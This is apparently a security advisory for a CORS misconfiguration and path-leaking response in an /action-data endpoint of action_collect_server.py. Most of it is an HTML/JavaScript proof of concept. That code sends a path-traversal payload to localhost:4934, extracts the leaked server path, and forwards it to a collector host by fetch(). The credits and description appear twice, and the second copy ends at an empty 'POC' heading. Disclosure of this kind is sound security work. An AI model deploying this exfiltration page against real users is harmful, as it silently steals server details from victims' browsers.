This vulnerability is found by Songwu security researcher,Zeyu Luo security researcher, Dr. CAO Yinfeng, Kevin(The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
Vulnerability descriptioni
The /action-data endpoint in action_collect_server.py, after successfully processing a request, directly echoes a string containing the server’s filesystem path in the HTTP response body. Because this endpoint also suffers from a CORS misconfiguration that allows arbitrary cross-origin access, an attacker can embed JavaScript in a public webpage to silently trigger the endpoint from the victim’s browser and exfiltrate the leaked path information to an attacker-controlled server. The entire process requires no user interaction, and the victim remains completely unaware.
POC
<!DOCTYPE html>
<html>
<body>
<pre id="out">requsting...</pre>
<script>
const out = document.getElementById('out');
const log = s => out.textContent += s + '\n';
// receiver (python3 -m http.server 8000)
const COLLECTOR = 'http://127.0.0.1:8000';
fetch('http://localhost:4934/action-data', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
taskId: "../../../../tmp/poc_infoleak_probe",
probe: true
})
})
.then(r => r.json())
.then(data => {
const savedPath = data.message?.replace('Event received and saved as ', '').trim();
log('[+] response: ' + JSON.stringify(data));
log('');
if (!savedPath) return;
const dateFolder = savedPath.match(/data\/(\d{8})\//)?.[1];
const filename = savedPath.split('/').pop();
const timestamp = filename?.match(/summary_event_(\d{8}_\d{6})/)?.[1];
const dotdots = (savedPath.match(/\.\.\//g) || []).length;
log('═══ leak info ═══');
log(`write path : ${savedPath}`);
log(`data dir : ${dateFolder}`);
log(`timestamp : ${timestamp}`);
log(`CWD dept : data/ upper ${dotdots} layer`);
log('');
// data send back
const exfil = { savedPath, dateFolder, timestamp, cwdDepth: dotdots };
fetch(`${COLLECTOR}/collect?data=` + encodeURIComponent(JSON.stringify(exfil)))
.then(() => log('[+] data has send ' + COLLECTOR))
.catch(() => log('[*] send out(collector 未启动则忽略)'));
})
.catch(e => log('[-] fail: ' + e));
</script>
</body>
</html>
This vulnerability is found by Songwu security researcher,Zeyu Luo security researcher, Dr. CAO Yinfeng, Kevin(The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
Vulnerability descriptioni
The /action-data endpoint in action_collect_server.py, after successfully processing a request, directly echoes a string containing the server’s filesystem path in the HTTP response body. Because this endpoint also suffers from a CORS misconfiguration that allows arbitrary cross-origin access, an attacker can embed JavaScript in a public webpage to silently trigger the endpoint from the victim’s browser and exfiltrate the leaked path information to an attacker-controlled server. The entire process requires no user interaction, and the victim remains completely unaware.
POC